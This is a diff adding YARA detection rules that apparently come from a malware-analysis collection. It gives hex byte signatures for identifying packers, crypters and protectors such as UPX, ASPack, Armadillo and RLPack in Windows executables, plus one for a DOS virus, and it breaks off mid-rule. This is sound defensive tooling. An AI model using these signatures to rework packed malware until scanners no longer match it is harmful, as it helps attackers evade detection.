+rule PseudoSigner02PENightMare2BetaAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E9 10 00 00 00 EF 40 03 A7 07 8F 07 1C 37 5D 43 A7 04 B9 2C 3A }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01MicrosoftVisualC60DebugVersionAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 51 90 90 90 01 01 90 90 90 90 68 ?? ?? ?? ?? 90 90 90 90 90 90 90 90 90 90 90 90 00 01 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 00 01 90 90 90 90 90 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DJoinv07publicRC4encryptiondrmist
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { C6 05 ?? ?? 40 00 00 C6 05 ?? ?? 40 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UPXv103v104
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 8A 07 72 EB B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 ?? 75 ?? 8B 1E 83 EE FC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEDiminisherV01Teraphy
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 53 51 52 56 57 55 E8 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WWPACKv305c4ExtrPasswcheckVirshield
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 03 05 C0 1A B8 ?? ?? 8C CA 03 D0 8C C9 81 C1 ?? ?? 51 B9 ?? ?? 51 06 06 B1 ?? 51 8C D3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ExeGuarderv18Exeiconcom
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 D0 53 56 57 8D 75 FC 8B 44 24 30 25 00 00 FF FF 81 38 4D 5A 90 00 74 07 2D 00 10 00 00 EB F1 89 45 FC E8 C8 FF FF FF 2D B2 04 00 00 89 45 F4 8B 06 8B 40 3C 03 06 8B 40 78 03 06 8B C8 8B 51 20 03 16 8B 59 24 03 1E 89 5D F0 8B 59 1C 03 1E 89 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule codeCrypter031Tibbar
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 58 53 5B 90 BB ?? ?? ?? 00 FF E3 90 CC CC CC 55 8B EC 5D C3 CC CC CC CC CC CC CC CC CC CC CC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPv073betaap0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 8B DD E8 00 00 00 00 5D 95 32 C0 95 89 9D 80 00 00 00 B8 42 31 40 00 BB 41 30 40 00 2B C3 03 C5 33 D2 8A 10 40 B9 ?? ?? 00 00 8B F9 30 10 8A 10 40 49 75 F8 64 EF 86 3D 30 00 00 0F B9 FF 4B 89 52 5C 4C BD 77 C2 0C CE 88 4E 2D E8 00 00 00 5D 0D DB 5E 56 }
+
+condition:
+		$a0
+}
+	
+	
+rule PEnguinCryptv10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 93 ?? ?? 00 55 50 67 64 FF 36 00 00 67 64 89 26 00 00 BD 4B 48 43 42 B8 04 00 00 00 CC 3C 04 75 04 90 90 C3 90 67 64 8F 06 00 00 58 5D BB 00 00 40 00 33 C9 33 C0 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MetrowerksCodeWarriorDLLv20
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 53 56 57 8B 75 0C 8B 5D 10 83 FE 01 74 05 83 FE 02 75 12 53 56 FF 75 08 E8 6E FF FF FF 09 C0 75 04 31 C0 EB 21 53 56 FF 75 08 E8 ?? ?? ?? ?? 89 C7 09 F6 74 05 83 FE 03 75 0A 53 56 FF 75 08 E8 47 FF FF FF 89 F8 8D 65 F4 5F 5E 5B 5D C2 0C 00 C9 }
+
+condition:
+		$a0
+}
+	
+	
+rule PECrc32088ZhouJinYu
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED B6 A4 45 00 8D BD B0 A4 45 00 81 EF 82 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv123b3v1241
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 70 40 ?? 87 DD 8B 85 A6 70 40 ?? 01 85 03 70 40 ?? 66 C7 85 70 40 90 ?? 90 01 85 9E 70 40 BB ?? D2 08 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Noodlecrypt2rsc
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 9A E8 76 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPack120BasicEditionLZMAAp0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 83 7C 24 28 01 75 0C 8B 44 24 24 89 85 9C 0C 00 00 EB 0C 8B 85 98 0C 00 00 89 85 9C 0C 00 00 8D B5 C4 0C 00 00 8D 9D 82 04 00 00 33 FF 6A 40 68 00 10 00 00 68 00 20 0C 00 6A 00 FF 95 2D 0C 00 00 89 85 94 0C 00 00 E8 59 01 00 00 EB 20 60 8B 85 9C 0C 00 00 FF B5 94 0C 00 00 FF 34 37 01 04 24 FF 74 37 04 01 04 24 FF D3 61 83 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01PENightMare2BetaAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E9 10 00 00 00 EF 40 03 A7 07 8F 07 1C 37 5D 43 A7 04 B9 2C 3A E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AHTeamEPProtector03fakeXtremeProtector105FEUERRADER
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 E8 00 00 00 00 5D 81 00 00 00 00 00 6A 45 E8 A3 00 00 00 68 00 00 00 00 E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPackv118BasicDLLLZMAAp0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 80 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 21 0B 00 00 8D 9D FF 02 00 00 33 FF E8 9F 01 00 00 6A 40 68 00 10 00 00 68 00 20 0C 00 6A 00 FF 95 AA 0A 00 00 89 85 F9 0A 00 00 EB 14 60 FF B5 F9 0A }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CrypKeyv5v6
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? ?? ?? 58 83 E8 05 50 5F 57 8B F7 81 EF ?? ?? ?? ?? 83 C6 39 BA ?? ?? ?? ?? 8B DF B9 0B ?? ?? ?? 8B 06 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule InnoSetupModulev109a
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 C0 53 56 57 33 C0 89 45 F0 89 45 C4 89 45 C0 E8 A7 7F FF FF E8 FA 92 FF FF E8 F1 B3 FF FF 33 C0 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ObsidiumV1300ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 04 ?? ?? ?? ?? E8 29 00 00 00 }
+	$a1 = { EB 04 ?? ?? ?? ?? E8 ?? 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule PCryptv351
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 43 52 59 50 54 FF 76 33 2E 35 31 00 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ThinstallEmbedded2312Jitit
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 6A 00 FF 15 ?? ?? ?? ?? E8 D4 F8 FF FF E9 E9 AD FF FF FF 8B C1 8B 4C 24 04 89 88 29 04 00 00 C7 40 0C 01 00 00 00 0F B6 49 01 D1 E9 89 48 10 C7 40 14 80 00 00 00 C2 04 00 8B 44 24 04 C7 41 0C 01 00 00 00 89 81 29 04 00 00 0F B6 40 01 D1 E8 89 41 10 C7 41 14 80 00 00 00 C2 04 00 55 8B EC 53 56 57 33 C0 33 FF 39 45 0C 8B F1 76 0C 8B 4D 08 03 3C 81 40 3B 45 0C 72 F4 8B CE E8 43 00 00 00 8B 46 14 33 D2 F7 F7 8B 5E 10 33 D2 8B F8 8B C3 F7 F7 89 7E 18 89 45 0C 33 C0 33 C9 8B 55 08 03 0C 82 40 39 4D 0C 73 F4 48 8B 14 82 2B CA 0F AF CF 2B D9 0F AF FA 89 7E 14 89 5E 10 5F 5E 5B 5D C2 08 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WWPACKv305c4Extractable
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 03 05 00 1A B8 ?? ?? 8C CA 03 D0 8C C9 81 C1 ?? ?? 51 B9 ?? ?? 51 06 06 B1 ?? 51 8C D3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPackAp0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 2C 0A 00 00 8D 9D 22 02 00 00 33 FF E8 83 01 00 00 6A 40 68 00 10 00 00 68 00 20 0C 00 6A 00 FF 95 CD 09 00 00 89 85 14 0A 00 00 EB 14 60 FF B5 14 0A }
+	$a1 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 5A 0A 00 00 8D 9D 40 02 00 00 33 FF E8 83 01 00 00 6A 40 68 00 10 00 00 68 00 20 0C 00 6A 00 FF 95 EB 09 00 00 89 85 3A 0A 00 00 EB 14 60 FF B5 3A 0A }
+	$a2 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 EB 03 0C 00 00 EB 03 0C 00 00 8D B5 CB 22 00 00 8D 9D F0 02 00 00 33 FF E8 47 02 00 00 EB 03 15 00 00 6A 40 68 00 10 00 00 68 00 20 0C 00 6A 00 FF 95 9B 0A }
+	$a3 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 2C 0A 00 00 8D 9D 22 02 00 00 33 FF E8 ?? ?? ?? ?? 6A 40 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A 00 FF 95 CD 09 00 00 89 85 ?? ?? ?? ?? EB 14 60 FF B5 14 0A }
+	$a4 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 5A 0A 00 00 8D 9D 40 02 00 00 33 FF E8 ?? ?? ?? ?? 6A 40 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A 00 FF 95 EB 09 00 00 89 85 ?? ?? ?? ?? EB 14 60 FF B5 3A 0A }
+	$a5 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 8D B5 CB 22 00 00 8D 9D F0 02 00 00 33 FF E8 ?? ?? ?? ?? EB 03 ?? ?? ?? 6A 40 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A 00 FF 95 9B 0A }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point or $a2 at pe.entry_point or $a3 at pe.entry_point or $a4 at pe.entry_point or $a5 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02VOBProtectCD5Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 36 3E 26 8A C0 60 E8 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PESpinv04x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 68 60 E8 00 00 00 00 8B }
+
+condition:
+		$a0
+}
+	
+	
+rule PseudoSigner02WatcomCCDLLAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 53 56 57 55 8B 74 24 14 8B 7C 24 18 8B 6C 24 1C 83 FF 03 0F 87 01 00 00 00 F1 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule yodasCrypter13AshkbizDanehkar
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 53 56 57 60 E8 00 00 00 00 5D 81 ED 6C 28 40 00 B9 5D 34 40 00 81 E9 C6 28 40 00 8B D5 81 C2 C6 28 40 00 8D 3A 8B F7 33 C0 EB 04 90 EB 01 C2 AC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule D1NS1GD1N
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 18 37 00 00 00 00 00 00 01 00 0A 00 00 00 18 00 00 80 00 00 00 00 ?? ?? 18 37 00 00 00 00 02 00 00 00 88 00 00 80 38 00 00 80 96 00 00 80 50 00 00 80 00 00 00 00 ?? ?? 18 37 00 00 00 00 00 00 01 00 00 00 00 00 68 00 00 00 00 00 00 00 ?? ?? 18 37 00 00 00 00 00 00 01 00 00 00 00 00 78 00 00 00 B0 F0 00 00 10 00 00 00 00 00 00 00 00 00 00 00 C0 F0 00 00 60 00 00 00 00 00 00 00 00 00 00 00 06 00 44 00 56 00 43 00 4C 00 41 00 4C 00 0B 00 50 00 41 00 43 00 4B 00 41 00 47 00 45 00 49 00 4E 00 46 00 4F 00 00 00 00 00 00 00 00 00 00 00 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule FSGv110EngdulekxtMicrosoftVisualC6070ASM
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 01 00 00 00 5A 5E E8 02 00 00 00 BA DD 5E 03 F2 EB 01 64 BB 80 ?? ?? 00 8B FA EB 01 A8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASPackv102aAlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 ?? ?? ?? ?? 5D 81 ED 3E D9 43 ?? B8 38 ?? ?? ?? 03 C5 2B 85 0B DE 43 ?? 89 85 17 DE 43 ?? 80 BD 01 DE 43 ?? ?? 75 15 FE 85 01 DE 43 ?? E8 1D ?? ?? ?? E8 79 02 ?? ?? E8 12 03 ?? ?? 8B 85 03 DE 43 ?? 03 85 17 DE 43 ?? 89 44 24 1C 61 FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01MinGWGCC2xAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 E8 02 00 00 00 C9 C3 90 90 45 58 45 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov253
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 40 ?? ?? ?? 68 54 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 58 ?? ?? ?? 33 D2 8A D4 89 15 EC }
+	$a1 = { 55 8B EC 6A FF 68 ?? ?? ?? ?? 40 ?? ?? ?? ?? 68 54 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF ?? ?? ?? 15 58 33 D2 8A D4 89 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule Armadillov252
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 ?? ?? ?? ?? E0 ?? ?? ?? ?? 68 D4 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF ?? ?? ?? 15 38 }
+	$a1 = { 55 8B EC 6A FF 68 E0 ?? ?? ?? 68 D4 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 38 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule Armadillov251
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 B8 ?? ?? ?? 68 D0 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 20 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov250
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 B8 ?? ?? ?? 68 F8 ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 20 ?? ?? ?? 33 D2 8A D4 89 15 D0 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Obsidium1331ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 ?? E8 29 00 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 24 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 02 ?? ?? 50 EB 01 ?? 33 C0 EB 04 ?? ?? ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 01 ?? EB 04 ?? ?? ?? ?? 58 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 02 ?? ?? E8 5F 27 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CExev10a
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 81 EC 0C 02 ?? ?? 56 BE 04 01 ?? ?? 8D 85 F8 FE FF FF 56 50 6A ?? FF 15 54 10 40 ?? 8A 8D F8 FE FF FF 33 D2 84 C9 8D 85 F8 FE FF FF 74 16 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DIETv144v145f
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { F8 9C 06 1E 57 56 52 51 53 50 0E FC 8C C8 BA ?? ?? 03 D0 52 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv098
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB D7 84 40 ?? 87 DD 8B 85 5C 85 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv099
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 2F 85 40 ?? 87 DD 8B 85 B4 85 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NsPacKV30LiuXingPing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? ?? ?? 66 8B 06 66 83 F8 00 74 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv110EngdulekxtMicrosoftVisualBasic5060
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { C1 CB 10 EB 01 0F B9 03 74 F6 EE 0F B6 D3 8D 05 83 ?? ?? EF 80 F3 F6 2B C1 EB 01 DE 68 77 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv090
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? 40 00 C3 9C 60 BD ?? ?? 00 00 B9 02 00 00 00 B0 90 8D BD 7A 42 40 00 F3 AA 01 AD D9 43 40 00 FF B5 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv092
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 BD ?? ?? ?? ?? B9 02 ?? ?? ?? B0 90 8D BD A5 4F 40 ?? F3 AA 01 AD 04 51 40 ?? FF B5 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv094
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 ?? ?? ?? ?? 5D 55 58 81 ED ?? ?? ?? ?? 2B 85 ?? ?? ?? ?? 01 85 ?? ?? ?? ?? 50 B9 02 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PeX099bartCrackPl
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 F5 ?? ?? ?? 0D 0A C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ObsidiumV1304ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 ?? ?? E8 ?? 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SoftwareCompressv14LITEBGSoftwareProtectTechnologies
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 81 2C 24 AA 1A 41 00 5D E8 00 00 00 00 83 2C 24 6E 8B 85 5D 1A 41 00 29 04 24 8B 04 24 89 85 5D 1A 41 00 58 8B 85 5D 1A 41 00 8B 50 3C 03 D0 8B 92 80 00 00 00 03 D0 8B 4A 58 89 8D 49 1A 41 00 8B 4A 5C 89 8D 4D 1A 41 00 8B 4A 60 89 8D 55 1A }
+	$a1 = { E8 00 00 00 00 81 2C 24 AA 1A 41 00 5D E8 00 00 00 00 83 2C 24 6E 8B 85 5D 1A 41 00 29 04 24 8B 04 24 89 85 5D 1A 41 00 58 8B 85 5D 1A 41 00 8B 50 3C 03 D0 8B 92 80 00 00 00 03 D0 8B 4A 58 89 8D 49 1A 41 00 8B 4A 5C 89 8D 4D 1A 41 00 8B 4A 60 89 8D 55 1A 41 00 8B 4A 64 89 8D 51 1A 41 00 8B 4A 74 89 8D 59 1A 41 00 68 00 20 00 00 E8 D2 00 00 00 50 8D 8D 00 1C 41 00 50 51 E8 1B 00 00 00 83 C4 08 58 8D 78 74 8D B5 49 1A 41 00 B9 18 00 00 00 F3 A4 05 A4 00 00 00 50 C3 60 8B 74 24 24 8B 7C 24 28 FC B2 80 33 DB A4 B3 02 E8 6D 00 00 00 73 F6 33 C9 E8 64 00 00 00 73 1C 33 C0 E8 5B 00 00 00 73 23 B3 02 41 B0 10 E8 4F 00 00 00 12 C0 73 F7 75 3F AA EB D4 E8 4D 00 00 00 2B CB 75 10 E8 42 00 00 00 EB 28 AC D1 E8 74 4D 13 C9 EB 1C 91 48 C1 E0 08 AC E8 2C 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 8E 02 D2 75 05 8A 16 46 12 D2 C3 33 C9 41 E8 EE FF FF FF 13 C9 E8 E7 FF FF FF 72 F2 C3 2B 7C 24 28 89 7C 24 1C 61 C3 60 FF 74 24 24 6A 40 FF 95 4D 1A 41 00 89 44 24 1C 61 C2 04 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule FixupPakv120
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 E8 00 00 00 00 5D 81 ED ?? ?? 00 00 BE 00 ?? 00 00 03 F5 BA 00 00 ?? ?? 2B D5 8B DD 33 C0 AC 3C 00 74 3D 3C 01 74 0E 3C 02 74 0E 3C 03 74 0D 03 D8 29 13 EB E7 66 AD EB F6 AD EB F3 AC 0F B6 C8 3C 00 74 06 3C 01 74 09 EB 0A 66 AD 0F B7 C8 EB 03 AD 8B C8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ARCSFXArchive
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8C C8 8C DB 8E D8 8E C0 89 ?? ?? ?? 2B C3 A3 ?? ?? 89 ?? ?? ?? BE ?? ?? B9 ?? ?? BF ?? ?? BA ?? ?? FC AC 32 C2 8A D8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MoleBoxv230Teggo
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 42 04 E8 ?? ?? 00 00 A3 ?? ?? ?? 00 8B 4D F0 8B 11 89 15 ?? ?? ?? 00 ?? 45 FC A3 ?? ?? ?? 00 5F 5E 8B E5 5D C3 CC CC CC CC CC CC CC CC CC CC CC E8 EB FB FF FF 58 E8 ?? 07 00 00 58 89 44 24 20 61 58 FF D0 E8 ?? ?? 00 00 CC CC CC CC CC CC CC }
+
+condition:
+		$a0
+}
+	
+	
+rule VxIgor
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 1E B8 CD 7B CD 21 81 FB CD 7B 75 03 E9 87 00 33 DB 0E 1F 8C }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FACRYPTv10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B9 ?? ?? B3 ?? 33 D2 BE ?? ?? 8B FE AC 32 C3 AA 49 43 32 E4 03 D0 E3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01WATCOMCCEXEAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 00 00 00 00 90 90 90 90 57 41 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPackV115V117aPlib043ap0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 33 FF E8 45 01 00 00 EB 0F FF 74 37 04 FF 34 37 FF D3 83 C4 08 83 C7 08 83 3C 37 00 75 EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EmbedPEv113cyclotron
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 EC 50 60 68 5D B9 52 5A E8 2F 99 00 00 DC 99 F3 57 05 68 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule eXcaliburv103forgotus
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 00 00 00 00 60 E8 14 00 00 00 5D 81 ED 00 00 00 00 6A 45 E8 A3 00 00 00 68 00 00 00 00 E8 58 61 EB 39 20 45 78 63 61 6C 69 62 75 72 20 28 63 29 20 62 79 20 66 6F 72 67 6F 74 2F 75 53 2F 44 46 43 47 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Petite14
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 66 9C 60 50 8B D8 03 00 68 54 BC 00 00 6A 00 FF 50 14 8B CC }
+
+condition:
+		$a0
+}
+	
+	
+rule Petite12
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 66 9C 60 E8 CA 00 00 00 03 00 04 00 05 00 06 00 07 00 08 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Petite13
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 66 9C 60 50 8D 88 00 F0 00 00 8D 90 04 16 00 00 8B DC 8B E1 }
+
+condition:
+		$a0
+}
+	
+	
+rule Upack021betaDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE 88 01 40 00 AD 8B F8 6A 04 95 A5 33 C0 AB 48 AB F7 D8 59 F3 AB C1 E0 0A B5 ?? F3 AB AD 50 97 51 58 8D 54 85 5C FF 16 72 5A 2C 03 73 02 B0 00 3C 07 72 02 2C 03 50 0F B6 5F FF C1 E3 ?? B3 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WebCopsEXELINKDataSecurity
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 03 05 EB 02 EB FC 55 EB 03 EB 04 05 EB FB EB 53 E8 04 00 00 00 72 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02FSG10Anorganix
+{
